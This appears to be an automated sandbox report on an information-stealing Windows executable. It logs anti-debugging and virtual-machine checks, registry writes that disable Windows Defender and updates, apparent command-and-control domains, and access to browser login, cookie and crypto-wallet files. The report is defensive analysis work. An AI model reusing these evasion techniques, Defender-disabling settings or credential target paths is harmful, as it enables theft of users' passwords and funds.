Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F91E second address: 54F924 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F924 second address: 54F9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F661D451436h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnp 00007F661D451448h 0x00000016 pop eax 0x00000017 mov si, 3394h 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F661D451438h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 cmc 0x00000038 push 00000000h 0x0000003a mov edx, dword ptr [ebp+122D2D2Ah] 0x00000040 push 00000003h 0x00000042 mov edi, 487D039Ch 0x00000047 xor dword ptr [ebp+122D28D7h], ecx 0x0000004d push C752CC9Fh 0x00000052 jmp 00007F661D45143Fh 0x00000057 xor dword ptr [esp], 0752CC9Fh 0x0000005e jmp 00007F661D451440h 0x00000063 lea ebx, dword ptr [ebp+124457E4h] 0x00000069 mov edi, ecx 0x0000006b xchg eax, ebx 0x0000006c pushad 0x0000006d jp 00007F661D45143Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 js 00007F661D451436h 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F9D7 second address: 54F9E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FA3E second address: 54FA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, 13C73B51h 0x00000010 push 00000000h 0x00000012 jmp 00007F661D45143Eh 0x00000017 call 00007F661D451439h 0x0000001c jmp 00007F661D451444h 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jbe 00007F661D451436h 0x0000002a jnp 00007F661D451436h 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FA8F second address: 54FAA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FAA2 second address: 54FAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Eh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FAB8 second address: 54FB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F661CE75E93h 0x0000000f pop edx 0x00000010 jmp 00007F661CE75E95h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jbe 00007F661CE75E94h 0x00000020 pop eax 0x00000021 mov esi, dword ptr [ebp+122D398Ch] 0x00000027 push 00000003h 0x00000029 jbe 00007F661CE75E9Bh 0x0000002f push 00000000h 0x00000031 add edi, 52C0432Ah 0x00000037 push 00000003h 0x00000039 call 00007F661CE75E89h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F661CE75E8Ch 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB4B second address: 54FB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB4F second address: 54FB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB55 second address: 54FB8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F661D451436h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jno 00007F661D45144Ch 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB8A second address: 54FB8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB8F second address: 54FBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jp 00007F661D451451h 0x00000011 push edx 0x00000012 jmp 00007F661D451449h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FBC4 second address: 54FC07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d lea ebx, dword ptr [ebp+124457EDh] 0x00000013 mov dword ptr [ebp+122D1BF7h], edx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b jmp 00007F661CE75E92h 0x00000020 pop eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jp 00007F661CE75E86h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FC07 second address: 54FC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FC89 second address: 54FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FC8F second address: 54FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F661D45143Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov cl, 5Ah 0x0000000f push 00000000h 0x00000011 jnl 00007F661D451436h 0x00000017 mov dx, di 0x0000001a push 006466F4h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F661D451443h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FCC9 second address: 54FCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 87EA8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 87E9C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A25E82 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AB2B57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 3DDCDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 576A02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 3DB4AA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 59AEA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 57CEE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 6096EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: 4BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: 4D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: 6D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_0056E4DF rdtsc 3_2_0056E4DF
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe TID: 3784 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe TID: 3332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Thread delayed: delay time: 922337203685477
Source: file.exe, 02FQBW3AYVFKS8DMY3O.exe.0.dr Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2097456466.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2261876972.0000000001760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.000000000170E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097456466.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 02FQBW3AYVFKS8DMY3O.exe.0.dr Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_0056E4DF rdtsc 3_2_0056E4DF
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_003E0709 LdrInitializeThunk, 3_2_003E0709
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.2258990583.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: QProgram Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, file.exe, 00000000.00000003.2142625341.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142795174.00000000017ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: file.exe String found in binary or memory: ets/Electrum-LTC
Source: file.exe String found in binary or memory: ElectronCash
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe String found in binary or memory: Wallets/Exodus
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
